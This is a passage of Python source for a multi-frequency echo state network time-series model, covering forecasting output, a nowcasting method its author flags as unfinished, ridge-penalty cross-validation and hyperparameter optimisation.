X_ms_multi[s,p:(p+self.models_N_[j])] = np.squeeze(Xj.loc[cpd])\n # #\n # p += self.models_N_[j]\n\n # # PCA\n # if not fit['pca'] is None:\n # X_ms_multi = fit['pca'].transform(X_ms_multi)\n # \n # # Forecasts\n # V_ms_t = np.hstack((np.ones((X_ms_multi.shape[0], 1)), X_ms_multi))\n # Y_ms_for_t = pd.DataFrame(data=V_ms_t @ W0, index=ref_dates_t)\n # \n # multistepForecast.append({\n # 't': t,\n # 'start_date': d,\n # 'Y_for': Y_ms_for_t,\n # 'V': V_ms_t,\n # 'X': X_ms_multi,\n # 'state_tuple': X_ms,\n # })\n \n \n # Output\n for_out = {\n 'model': 'ESNMultiFrequency',\n 'multistepForecast': multistepForecast,\n 'Yf': Yf,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n 'init': init,\n }\n\n return for_out\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Nowcasting\n def fixedParamsNowcast(self, Yf, zf, fit, steps=None, init=None, debug=False):\n if True:\n \"\"\"\n !!!\n TODO: need to correctly implement fit_now() method, because below \n we are not computing the nowcast but a high-frequency forecast\n \"\"\"\n print(\"Error: method needs to be updated!\")\n return None\n\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n\n # Find maximal frequency dates\n max_freq = pd.infer_freq(zf_dates[0])\n max_periods = infer_periods(max_freq)\n max_freq_dates = zf_dates[0]\n for d in zf_dates:\n d_f = pd.infer_freq(d)\n p_f = infer_periods(d_f)\n if p_f > max_periods:\n max_freq = d_f\n max_periods = p_f\n max_freq_dates = d\n\n # States\n #if init is None:\n # init = []\n # for Xj in fit['state_tuple']:\n # init.append(np.squeeze(Xj.iloc[-1,].to_numpy()))\n\n if init is None:\n init = []\n init_dates = (Yf_dates, ) + zf_dates if self.ar_ else zf_dates\n for j, x_j in enumerate(fit['state_tuple']):\n d = init_dates[j][0]\n cpd, _ = closest_past_date(x_j.index, d - pd.Timedelta(microseconds=1))\n init.append(np.squeeze(x_j.loc[cpd].to_numpy()))\n\n Xf = self.multifreq_states(\n Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n init=init, washout_len=0\n )\n\n # Add state init as pre-stat\n #Xf_w_init = []\n #for j, Xfj in enumerate(Xf):\n # Xf_w_init.append(\n # fit['state_tuple'][j].iloc[-1:,].append(Xfj)\n # )\n \n # States matrix\n Xf_multi_hf = self.multifreq_states_to_matrix(\n ref_dates=max_freq_dates, states=Xf,\n )\n \n # Re-add dates to track states and observations easily\n Yf_ = pd.DataFrame(data=Yf_, index=Yf_dates)\n Xf_now = pd.DataFrame(data=Xf_multi_hf, index=max_freq_dates)\n\n # Compute nowcast\n W_n = fit['fit_for'][0]['W']\n\n Y_now = pd.DataFrame(data=np.full(len(max_freq_dates), np.nan), index=max_freq_dates)\n Y = Y_now.copy()\n Errors = Y_now.copy()\n\n for d in max_freq_dates:\n Xf_now_d = Xf_now.loc[d].to_numpy().reshape(1, -1)\n\n # PCA\n if not fit['pca'] is None:\n Xf_now_d = fit['pca'].transform(Xf_now_d)\n\n cfd, _ = closest_future_date(Yf_dates, d)\n\n Y_now_d = np.hstack((np.ones((1, 1)), Xf_now_d)) @ W_n\n Y_d = Yf_.loc[cfd]\n Error_d = Y_d - np.squeeze(Y_now_d)\n \n Y_now.loc[d] = Y_now_d\n Y.loc[d] = Y_d\n Errors.loc[d] = Error_d\n NESS = np.sum(Errors.to_numpy() ** 2)\n\n Nowcast = [{\n 'Y_now': Y_now,\n 'Errors': Errors,\n 'NESS': NESS,\n 'Y': Y,\n 'V': Y_now,\n 'X': Xf_multi_hf, \n }]\n\n # Output\n now_out = {\n 'model': 'ESNMultiFrequency',\n 'Nowcast': Nowcast,\n 'dates': max_freq_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n 'init': init,\n }\n\n return now_out\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Multi-frequency ridge penalty cross-validation\n \n def ridge_lambda_cv(self, Y, z, method='ridge', cv_options='-cv:5', steps=1, Lambda0=1e-1,\n steps_weights=None, Lambda_comps=None, init=None, washout_len=0, debug=True):\n if debug: print(\"ESNMultiFrequency.ridge_lambda_cv()\")\n\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Decompose optimization type string\n method_name = re.findall(\"^\\w+(?=-)?\", method)\n method_opts = re.findall(\"(?<=-)\\w+(?=:)?\", method)\n method_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", method)\n\n assert method_name[0] == 'ridge', \"Only supported method is 'ridge'\"\n\n if debug:\n print(\". Method:\")\n print(method_name)\n print(method_opts)\n print(method_nums)\n\n cv_opts = re.findall(\"(?<=-)\\w+(?=:)?\", cv_options)\n cv_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", cv_options)\n\n if debug:\n print(\". CV Options:\")\n print(cv_opts)\n print(cv_nums)\n\n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=washout_len,\n )\n\n # States matrix\n X_multi = self.multifreq_states_to_matrix(\n ref_dates=Y_dates, states=X,\n )\n\n # OPTIONAL: reduce state dimensionalty using PCA\n pca = None\n if 'pca' in method_opts:\n pca_factor = float(method_nums[method_opts.index('pca')])\n assert pca_factor > 0\n if pca_factor > 1:\n pca_factor = int(pca_factor)\n\n # PCA\n pca = PCA(n_components=pca_factor)\n X_multi = pca.fit_transform(X_multi)\n # NOTE: below is the \"wrong\" time-dimension \"PCA\"\n #X_multi = pca.fit(X_multi.T).components_.T\n\n if debug: print(f\". PCA: states space size reduced to N = {pca.n_components_}\")\n\n # Fallback parameters\n cv_splits = 2\n test_size = None\n cv_min_split_size = None\n cv_max_split_size = None\n if 'cv' in cv_opts: \n cv_splits = int(cv_nums[cv_opts.index('cv')])\n assert cv_splits >= 0\n if 'test_size' in cv_opts:\n test_size = int(cv_nums[cv_opts.index('test_size')])\n assert test_size >= 0\n if 'cv_min_split_size' in cv_opts:\n if 'cv' in cv_opts:\n print(\"[!] Option cv_min_split_size overwrites baseline CV folds option\")\n cv_min_split_size = int(cv_nums[cv_opts.index('cv_min_split_size')])\n assert cv_min_split_size >= 0\n if 'cv_max_split_size' in cv_opts:\n cv_max_split_size = int(cv_nums[cv_opts.index('cv_max_split_size')])\n assert cv_max_split_size >= 0\n\n # CV method variations\n isotropic_cv = False\n multistep_cv = False\n shift_cv = False\n if 'isotropic' in method_opts:\n isotropic_cv = True\n if 'multistep' in method_opts:\n multistep_cv = True\n if test_size is None:\n test_size = steps\n elif test_size > steps:\n print(\"[!] Multi-step ridge penalty cross-validation, alert:\")\n print(f\" : CV test split size option is {test_size}, but steps is {steps}\")\n print(f\" -> Reducing CV test split size to {steps}\")\n test_size = steps\n if 'shift' in method_opts:\n shift_cv = True\n if cv_min_split_size is None:\n raise ValueError(\"To use the single-shift CV option cv_min_split_size needs to be set\")\n\n # Cross-validation object\n if (cv_splits > 2) and (not shift_cv):\n tscv = TimeSeriesSplit(\n n_splits=cv_splits, \n test_size=test_size,\n max_train_size=cv_max_split_size, \n #gap=0,\n )\n elif shift_cv:\n tscv = ShiftTimeSeriesSplit(\n min_split_size=cv_min_split_size,\n test_size=test_size,\n max_split_size=cv_max_split_size,\n )\n else:\n raise ValueError(\"Please choose a number of CV splits > 2 (option '-cv:__')\")\n\n #for train_index, test_index in tscv.split(X_multi):\n # print(train_index)\n # print(test_index)\n # print(\"---------------------------\")\n\n assert steps > 0\n if multistep_cv:\n if steps_weights is None:\n steps_weights = np.ones(steps) / steps\n else:\n assert len(steps_weights) == steps\n steps_weights = np.squeeze(np.asarray(steps_weights))\n\n # Ridge penalty cross-validation objective\n if multistep_cv:\n # State reference dates\n #ref_dates = Y_dates\n #ref_index = len(fit['dates']) - 1\n #ref_dates_0 = ref_dates[ref_index:]\n\n # Slice matrices\n Ys = Y_[1:,]\n Xs = X_multi[0:(-1),]\n\n # Prepare date indexes for correct state iteration\n cpd_x_j = []\n tgd_x_j = []\n kt_j = [0 for _ in range(len(X))]\n for train_index, test_index in tscv.split(X_multi[0:(-1),]):\n dates_split = Y_dates[test_index]\n cpd_split = []\n tgd_split = []\n for j, x_j in enumerate(X):\n cpd, kt = closest_past_date(x_j.index, dates_split[0], cutoff=kt_j[j])\n cpd_split.append(cpd)\n kt_j[j] = kt\n #\n tgd, _ = closest_past_date(x_j.index, dates_split[-1], cutoff=kt-1)\n tgd_split.append(tgd)\n cpd_x_j.append(cpd_split)\n tgd_x_j.append(tgd_split)\n\n #print(\"...........\")\n #print(train_index)\n #print(test_index)\n\n # Multi-step ahead cross-validation\n def CV_obj(p_lambda, p_lambda_comps):\n # Rescale penalty\n p_lambda = 10 ** (p_lambda)\n #p_lambda_out = p_lambda[0:len(self.models_)]\n #p_lambda_comps = p_lambda[len(self.models_):]\n\n if isotropic_cv:\n Lambda_ = p_lambda[0]\n else:\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = p_lambda[n] * np.ones(k)\n i += k\n Lambda_ = np.diagflat(d)\n\n Obj = 0\n l = 0\n for train_index, test_index in tscv.split(Xs):\n Ws = ls_ridge(Y=Ys[train_index,], X=Xs[train_index,], Lambda=Lambda_)\n\n #j_dates = Y_dates[np.hstack((train_index[-1], test_index[0:-1]))]\n #j_dates = Y_dates[test_index]\n #cpd = j_dates[0]\n #tgd = j_dates[-1]\n\n # Iterate states forward\n #test_dates = ref_dates[test_index]\n X_ms_multi = np.full((len(test_index), self.M_), np.nan)\n p = 0\n for j, x_j in enumerate(X):\n cpd = cpd_x_j[l][j]\n tgd = tgd_x_j[l][j]\n\n # Forward iterations indeces\n dates_x_j = x_j.loc[cpd:tgd,].index\n slice_x_j = dates_x_j.get_indexer(Y_dates[test_index])\n iters_x_j = len(dates_x_j)\n\n # Autonomous weigths\n comps_cpd = Y_dates[train_index[0]]\n comps_tgd = Y_dates[train_index[-1]]\n if self.ar_:\n if j == 0:\n Ys_j = Y.loc[comps_cpd:comps_tgd,].to_numpy()\n else:\n Ys_j = z[j-1].loc[comps_cpd:comps_tgd,].to_numpy()\n else:\n Ys_j = z[j].loc[comps_cpd:comps_tgd,].to_numpy()\n Xs_j = x_j.loc[comps_cpd:comps_tgd,].to_numpy()\n Ws_j = ls_ridge(Y=Ys_j[1:,], X=Xs_j[0:-1,], Lambda=p_lambda_comps[n])\n\n # Generate states\n init_x_j = np.squeeze(x_j.loc[cpd,].to_numpy())\n Xj, _ = self.models_[j].base_generate_autostates(\n T=iters_x_j, \n W=Ws_j, init=init_x_j\n )\n #\n X_ms_multi[:,p:(p+self.models_N_[j])] = Xj[slice_x_j,]\n p += self.models_N_[j]\n #\n l += 1\n\n Ys_fit = np.hstack((np.ones((X_ms_multi.shape[0], 1)), X_ms_multi)) @ Ws\n Obj += np.sum(steps_weights * np.squeeze(Ys[test_index,] - Ys_fit) ** 2) / len(test_index)\n\n #print(\"-----------------------\")\n #print(Y_dates[train_index])\n #print(Y_dates[test_index])\n \n return Obj\n\n if debug and (isotropic_cv or len(self.models_) == 1):\n tmp_lambda_ls = np.linspace(-5, 5, 30)\n tmp_CV_obj = np.array([CV_obj(np.array((l, )), [Lambda0,]) for l in tmp_lambda_ls],)\n plt.figure(figsize=(5,2))\n plt.plot(tmp_lambda_ls, np.log10(tmp_CV_obj))\n plt.grid()\n plt.xlabel(\"$\\log_{10}(\\lambda)$\")\n plt.ylabel(\"$\\log_{10}(Loss(\\lambda))$\")\n plt.show()\n\n #print(CV_obj(np.ones(2), [1e-2, 1e-2]))\n #return [-1,]\n\n else:\n # Standard one-step-ahead cross-validation\n\n # Infer target frequency\n # NOTE: unfortunately this is needed to be able to correctly slice\n # the regressors, which are of a higher frequency than Y\n # and thus start from a previous point in time\n Y_freq = pd.infer_freq(Y_dates)\n Y_dates_offset = Y_dates - pd.tseries.frequencies.to_offset(Y_freq)\n\n # NOTE: to properly estimate CV loss, one needs to normalize data at\n # each split and re-compute states. To make obj. fun. evaluation\n # feasible, pre-compute all state matrices.\n X_multi_by_split = []\n Y_target_by_split = []\n for train_index, test_index in tscv.split(range(len(Y_dates)-1)):\n # Dates\n train_state_dates = Y_dates[train_index]\n test_state_dates = Y_dates[test_index]\n train_state_dates_offset = Y_dates_offset[train_index[[0]]]\n #test_state_dates_offset = Y_dates_offset[test_index]\n\n train_target_dates = Y_dates[[i + 1 for i in train_index]]\n test_target_dates = Y_dates[[i + 1 for i in test_index]]\n\n #print(f\"+ -------------------------------------------\")\n #print(f\"train_state_dates: \\n{train_state_dates}\\n~\")\n #print(f\"test_state_dates: \\n{test_state_dates}\\n~\")\n #print(f\"train_state_dates_offset: \\n{train_state_dates_offset}\\n~\")\n #print(f\"train_target_dates: \\n{train_target_dates}\\n~\")\n #print(f\"test_target_dates: \\n{test_target_dates}\\n~\")\n\n # Slice\n z_split = []\n #z_split_dates = []\n for j, zj in enumerate(z):\n zj_split_train = zj.loc[train_state_dates_offset[0]:train_state_dates[-1],]\n mean_zj = zj_split_train.mean()\n std_zj = zj_split_train.std()\n zj_split = (zj.loc[\n train_state_dates_offset[0]:test_state_dates[-1],\n ] - mean_zj) / std_zj\n\n z_split.append(zj_split)\n #z_split_dates.append(zj_split.index)\n \n mean_Y = Y.loc[train_state_dates[0]:train_target_dates[-1],].mean()\n std_Y = Y.loc[train_state_dates[0]:train_target_dates[-1],].std()\n Y_split_state = (Y.loc[\n train_state_dates[0]:test_state_dates[-1],\n ] - mean_Y) / std_Y\n #Y_split_state_dates = Y_split_state.index\n\n # Flatten\n Y_split_state, Y_split_state_dates, z_split, z_split_dates = (\n self.prep_data(Y_split_state, z_split)\n )\n\n # States\n X_split = self.multifreq_states(\n Y=Y_split_state, z=z_split, Y_dates=Y_split_state_dates, z_dates=z_split_dates,\n init=init, washout_len=washout_len,\n )\n\n X_split_multi = self.multifreq_states_to_matrix(\n ref_dates=Y_split_state_dates, states=X_split,\n )\n X_split_multi_train = X_split_multi[train_index,]\n X_split_multi_test = X_split_multi[test_index,]\n\n # Targets\n Y_split_targets_train = ((Y.loc[train_target_dates] - mean_Y) / std_Y).to_numpy()\n Y_split_targets_test = ((Y.loc[test_target_dates] - mean_Y) / std_Y).to_numpy()\n\n # Save split slices\n X_multi_by_split.append(\n (X_split_multi_train, X_split_multi_test)\n )\n Y_target_by_split.append(\n (Y_split_targets_train, Y_split_targets_test)\n )\n\n if debug: print(\". Folds built\")\n\n def CV_obj(p_lambda, s):\n # Rescale penalty\n p_lambda = 10**(p_lambda)\n\n if isotropic_cv:\n Lambda_ = p_lambda[0]\n else:\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = p_lambda[n] * np.ones(k)\n i += k\n Lambda_ = np.diagflat(d)\n\n Obj = 0\n\n # Slice matrices\n #Ys = Y_[(1+s):,]\n #Xs = X_multi[0:(-1-s),]\n #for train_index, test_index in tscv.split(Xs):\n # Ws = ls_ridge(Y=Ys[train_index,], X=Xs[train_index,], Lambda=Lambda_)\n #\n # Ys_fit = np.hstack((np.ones((Xs[test_index,].shape[0], 1)), Xs[test_index,])) @ Ws\n # Obj += np.sum((Ys[test_index,] - Ys_fit) ** 2) / len(test_index)\n #\n # #print(\"-----------------------\")\n # #print(Y_dates[train_index])\n # #print(Y_dates[test_index])\n\n for j, X_multi_split_j in enumerate(X_multi_by_split):\n Ws = ls_ridge(Y=Y_target_by_split[j][0], X=X_multi_split_j[0], Lambda=Lambda_)\n\n Ys_fit = np.hstack((np.ones((X_multi_split_j[1].shape[0], 1)), X_multi_split_j[1])) @ Ws\n Ys_target = Y_target_by_split[j][1]\n\n Obj += np.mean((Ys_target - Ys_fit) ** 2)\n \n return Obj\n\n\n #print(CV_obj(np.ones(1), 0))\n #return [-1,]\n\n if debug and (isotropic_cv or len(self.models_) == 1):\n tmp_lambda_ls = np.linspace(-7, 5, 50)\n tmp_CV_obj = np.array([CV_obj(np.array((l, )), 0) for l in tmp_lambda_ls])\n plt.figure(figsize=(5,2))\n plt.plot(tmp_lambda_ls, np.log10(tmp_CV_obj))\n plt.grid()\n plt.xlabel(\"$\\log_{10}(\\lambda)$\")\n plt.ylabel(\"$\\log_{10}(Loss(\\lambda))$\")\n plt.show()\n\n # Initialization and bounds\n Lambda0 = np.atleast_1d(np.asarray(np.log10(Lambda0)))\n xl = -5 * np.ones(Lambda0.shape),\n xu = +5 * np.ones(Lambda0.shape)\n if pca is None:\n if (not isotropic_cv) and (len(Lambda0) == 1):\n Lambda0 = np.repeat(Lambda0, len(self.models_))\n xl = np.repeat(xl, len(self.models_))\n xu = np.repeat(xu, len(self.models_))\n else:\n if not len(Lambda0) == 1:\n print(\"PCA requires scalar ridge penalty, selecting only first component of 'Lambda0'\")\n Lambda0 = Lambda0[0]\n xl = [-5,],\n xu = [+5,]\n\n # CV \n Lambda = []\n if multistep_cv:\n if Lambda_comps is None:\n Lambda_comps = Lambda0\n else:\n assert len(Lambda_comps) == len(self.models_)\n\n res = scipy_minimize(\n fun=lambda lb : CV_obj(lb, Lambda_comps),\n x0=Lambda0,\n bounds=tuple(zip(xl, xu)),\n method='L-BFGS-B',\n options={'disp': True},\n )\n\n if debug:\n print(f\"+ ----------------------------\")\n print(\"Best solution found:\")\n print(f\"lambda = {10 ** res.x}\")\n print(f\"F = {res.fun}\")\n\n Lambda = np.atleast_1d(10 ** (res.x))\n\n else:\n for s in range(steps):\n res_s = scipy_minimize(\n fun=lambda lb : CV_obj(lb, s),\n x0=Lambda0,\n bounds=tuple(zip(xl, xu)),\n method='L-BFGS-B',\n options={'disp': True},\n )\n\n if debug:\n print(f\"+ s = {s} --------------------\")\n print(\"Best solution found:\")\n print(f\"lambda = {10 ** res_s.x}\")\n print(f\"F = {res_s.fun}\")\n\n Lambda.append(np.atleast_1d(10 ** (res_s.x)))\n\n return Lambda\n\n \n def ridge_lambda_components_cv(self, Y, z, cv_options='-cv:5', Lambda0=1e-2,\n init=None, washout_len=0, debug=True):\n if debug: print(\"ESNMultiFrequency.ridge_lambda_components_cv()\")\n\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Decompose optimization type string\n cv_opts = re.findall(\"(?<=-)\\w+(?=:)?\", cv_options)\n cv_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", cv_options)\n\n if debug:\n print(\". CV Options:\")\n print(cv_opts)\n print(cv_nums)\n\n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=washout_len,\n )\n\n cv_splits = 2\n test_size = None\n if 'cv' in cv_opts: \n cv_splits = int(cv_nums[cv_opts.index('cv')])\n assert cv_splits >= 0\n if 'test_size' in cv_opts:\n test_size = int(cv_nums[cv_opts.index('test_size')])\n assert test_size >= 0\n\n if cv_splits > 2:\n tscv = TimeSeriesSplit(\n n_splits=cv_splits, \n test_size=test_size,\n #max_train_size=20, \n #gap=0,\n )\n else:\n raise ValueError(\"Please choose a number of CV splits > 2 (option '-cv:__')\")\n\n \n # Standard one-step-ahead cross-validation\n def CV_obj(p_lambda, j):\n Ys_j = z[j].iloc[1:,].to_numpy()\n Xs_j = X[j].iloc[0:-1,].to_numpy()\n\n # Penalty\n k = self.states_N_[j]\n Lambda_ = np.eye(k) * (10 ** (p_lambda))\n\n Obj = 0\n for train_index, test_index in tscv.split(Xs_j):\n Ws_j = ls_ridge(Y=Ys_j[train_index,], X=Xs_j[train_index,], Lambda=Lambda_)\n\n Ys_fit = np.hstack((np.ones((Xs_j[test_index,].shape[0], 1)), Xs_j[test_index,])) @ Ws_j\n Obj += np.sum((Ys_j[test_index,] - Ys_fit) ** 2) / len(test_index)\n \n return Obj\n\n #tmp_lambda_ls = np.linspace(-6, 5, 30)\n #tmp_CV_obj = np.array([CV_obj(np.array((l, )), 0) for l in tmp_lambda_ls])\n #plt.plot(tmp_lambda_ls, tmp_CV_obj)\n #plt.grid()\n #plt.show()\n\n # Initialization and bounds\n Lambda0 = np.atleast_1d(np.array(Lambda0))\n xl = -5 * np.ones(Lambda0.shape),\n xu = +5 * np.ones(Lambda0.shape)\n if len(Lambda0) == 1:\n Lambda0 = np.repeat(Lambda0, len(self.models_))\n assert len(Lambda0) == len(self.models_), \"Lambda must have same length as number of models\"\n\n # CV\n Lambda_j = np.full(len(Lambda0), np.nan)\n for j, _ in enumerate(z_):\n res_j = scipy_minimize(\n fun=lambda lb : CV_obj(lb, j),\n x0=Lambda0[j],\n bounds=tuple(zip(xl, xu)),\n method='L-BFGS-B',\n options={'disp': True},\n )\n\n if debug:\n print(f\"+ j = {j} --------------------\")\n print(\"Best solution found:\")\n print(f\"lambda = {10 ** res_j.x}\")\n print(f\"F = {res_j.fun.round(5)}\")\n\n Lambda_j[j] = 10 ** (res_j.x)\n\n return Lambda_j\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Multi-Frequency Optimization\n def optim(self, Y, z, mode='rho_lambda', steps=1, method='ridge', loss='RSS',\n \tLambda=0, init=None, washout_len=0, optimized_ESN=True, debug=True):\n if debug: print(\"ESNMultiFrequency.optim()\")\n\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(z), \"Number of ESN models does not correspond to number of data series\"\n\n # Decompose optimization type string\n method_name = re.findall(\"^\\w+(?=-)?\", method)\n method_opts = re.findall(\"(?<=-)\\w+(?=:)?\", method)\n method_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", method)\n\n method = method_name[0]\n\n if debug:\n print(\". Method:\")\n print(method_name)\n print(method_opts)\n print(method_nums)\n\n mode_pars = re.findall(\"^\\w+(?=-)?\", mode)\n mode_opts = re.findall(\"(?<=-)\\w+(?=:)?\", mode)\n mode_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", mode)\n\n if debug:\n print(\". Mode:\")\n print(mode_pars)\n print(mode_opts)\n print(mode_nums)\n\n assert len(mode_pars) > 0, \"Optimization method must be specified\"\n mode_pars = mode_pars[0]\n\n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n # NOTE: we compute 'preliminary' states to create alignment\n # indexes that can be re-used in the optimization loop\n # (direct date comparison are too expensive)\n if debug: print(\". Building states date indexes\")\n\n pre_X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # States indexes\n X_multi_idx = []\n for j, Xj in enumerate(pre_X):\n if not self.states_lags_ is None:\n idx_j = np.full((1+self.states_lags_[j], len(Y_dates)), np.nan)\n else:\n idx_j = np.full((1, len(Y_dates)), np.nan)\n kt = 0\n for t, lf_date_t in enumerate(Y_dates):\n _, kt = closest_past_date(Xj.index, lf_date_t, cutoff=kt)\n idx_j[0,t] = kt #Xj.index.get_loc(cpd)\n if not self.states_lags_ is None:\n for l in range(self.states_lags_[j]):\n idx_j[1+l,t] = kt-1\n X_multi_idx.append(idx_j.astype(int))\n\n # OPTIONAL: reduce state dimensionalty using PCA\n pca = None\n if 'pca' in method_opts:\n pca_factor = float(method_nums[method_opts.index('pca')])\n assert pca_factor > 0\n if pca_factor > 1:\n pca_factor = int(pca_factor)\n\n # PCA\n pca = PCA(n_components=pca_factor)\n\n # Define a fit function to make objective compact\n Wfun = None\n if method == 'least_squares':\n Wfun = lambda Y, X : ls_ridge(Y=Y, X=X, Lambda=0)\n elif method == 'ridge':\n Lambda_ = None\n if not np.isscalar(Lambda):\n if pca is None:\n assert len(Lambda) == len(self.models_), \"Lambda is not scalar, must have same length as number of models\"\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = Lambda[n] * np.ones(k)\n i += k\n Lambda_ = np.diagflat(d)\n else:\n Lambda_ = Lambda[0]\n else:\n Lambda_ = Lambda\n Wfun = lambda Y, X : ls_ridge(Y=Y, X=X, Lambda=Lambda_)\n elif method == 'rls':\n Wfun = lambda Y, X, W0, P0 : r_ls(Y=Y, X=X, W0=W0, P0=P0)\n else:\n raise ValueError(\"Fitting method not defined\")\n\n if debug: print(\". Optimization\")\n\n mN = len(self.models_N_)\n\n # Optimize\n res = None\n if mode_pars == 'RGL':\n # Fallback parameters\n cv_splits = 0\n test_size = None\n min_train_size = 1\n if 'cv' in mode_opts: \n cv_splits = int(mode_nums[mode_opts.index('cv')])\n assert cv_splits >= 0\n if method == 'rls': \n print(\"[Fit method is RLS, ignoring CV options]\")\n if 'test_size' in mode_opts:\n test_size = int(mode_nums[mode_opts.index('test_size')])\n assert test_size >= 0\n if 'min_train_size' in mode_opts:\n min_train_size = int(mode_nums[mode_opts.index('min_train_size')])\n assert min_train_size >= 0\n\n # Generate splits\n tscv = None\n if method in ('least_squares', 'ridge'):\n if cv_splits > 2:\n tscv = TimeSeriesSplit(n_splits=cv_splits, test_size=test_size)\n\n def HYPER_states(p_rho, p_gamma, p_leak_rate):\n # Multifrequency state matrix\n X_ = np.full((len(Y_dates), sum(self.states_N_)), np.nan)\n\n # Y states\n #X0 = self.models_[0].generate_states(\n # z=Y_, A=self.models_[0].A_, C=self.models_[0].C_, zeta=self.models_[0].zeta_,\n # rho=p_rho[0], gamma=p_gamma[0], leak_rate=p_leak_rate[0],\n # init=init[0], washout_len=washout_len\n #)\n #X_[:,0:self.models_N_[0]] = X0\n\n # z states\n Z = (Y, ) + z if self.ar_ else z\n p = 0 #self.models_N_[0]\n for j, zj_ in enumerate(Z):\n Xj = self.models_[j].generate_states(\n z=zj_, A=self.models_[j].A_, C=self.models_[j].C_, zeta=self.models_[j].zeta_,\n rho=p_rho[j], gamma=p_gamma[j], leak_rate=p_leak_rate[j],\n init=init[j], washout_len=washout_len\n )\n X_[:,p:(p+self.models_N_[j])] = Xj[X_multi_idx[j][0,],]\n # Lags\n q = p + self.models_N_[j]\n for l in range(self.states_lags_[j]):\n X_[:,q:(q+self.models_N_[j])] = Xj[X_multi_idx[j][1+l,],]\n q += self.models_N_[j]\n p += q\n\n #X_c = X_ - np.mean(X_, axis=0)\n #u, s, vh = np.linalg.svd(X_c.T @ X_c, full_matrices=False)\n\n #print(u.shape)\n #print(s)\n #print(vh.shape)\n\n #s_cumvar = np.cumsum(np.sqrt(s)) / np.sum(np.sqrt(s))\n #idx = len([1 for j in s_cumvar if j <= 0.95])\n #X_svd = 0 #u[:,0:idx]\n\n #print(X_svd[0,:])\n #print(X_svd[-1,:])\n\n # PCA\n if not pca is None:\n X_ = pca.fit_transform(X_)\n # NOTE: below is the \"wrong\" time-dimension \"PCA\"\n #X_ = pca.fit(X_.T).components_.T\n\n return X_\n\n #print(HYPER_states([0.5,0.5,0.5], [1,1,1], [0,0,0]))\n\n def HYPER_obj(parsRLGL):\n p_rho = parsRLGL[0:mN]\n # NOTE: transform lambda with an exponential function \n # to reduce parameter space size\n #p_lambda = np.exp(parsRLGL[mN:(2*mN)]) - 1\n #p_gamma = parsRLGL[(2*mN):(3*mN)]\n #p_leak_rate = parsRLGL[(3*mN):]\n\n #p_lambda = 1e-8 * np.ones(mN)\n p_gamma = parsRLGL[(mN):(2*mN)]\n p_leak_rate = parsRLGL[(2*mN):]\n\n #print(p_rho)\n #print(p_gamma)\n #print(p_leak_rate)\n\n X_ = HYPER_states(p_rho, p_gamma, p_leak_rate)\n\n #print(X_.shape)\n #print(X_[0,:])\n\n # Slice matrices\n Ys = Y_[1:,]\n Xs = X_[0:(-1),]\n \n Obj = 0\n if method in ('least_squares', 'ridge'):\n if not tscv is None:\n for train_index, test_index in tscv.split(Xs):\n W_ = Wfun(Ys[train_index,], Xs[train_index])\n if loss == 'RSS':\n # RSS\n Res = (Ys[test_index,] - np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_)\n Obj += np.sum(Res ** 2) / len(test_index)\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_ + 5, Ys[test_index,] + 5))\n else:\n raise ValueError(\"Unknown loss function\")\n #Obj += np.sum(hammer_loss(Res, 0.5)) / len(test_index)\n #Obj += np.sum((Res ** 2) * np.abs(Ys[test_index,])) / len(test_index)\n else:\n W_ = Wfun(Ys, Xs)\n if loss == 'RSS':\n # RSS\n Res = (Ys - np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_)\n Obj += np.sum(Res ** 2)\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_ + 5, Ys + 5))\n else:\n raise ValueError(\"Unknown loss function\") \n elif method 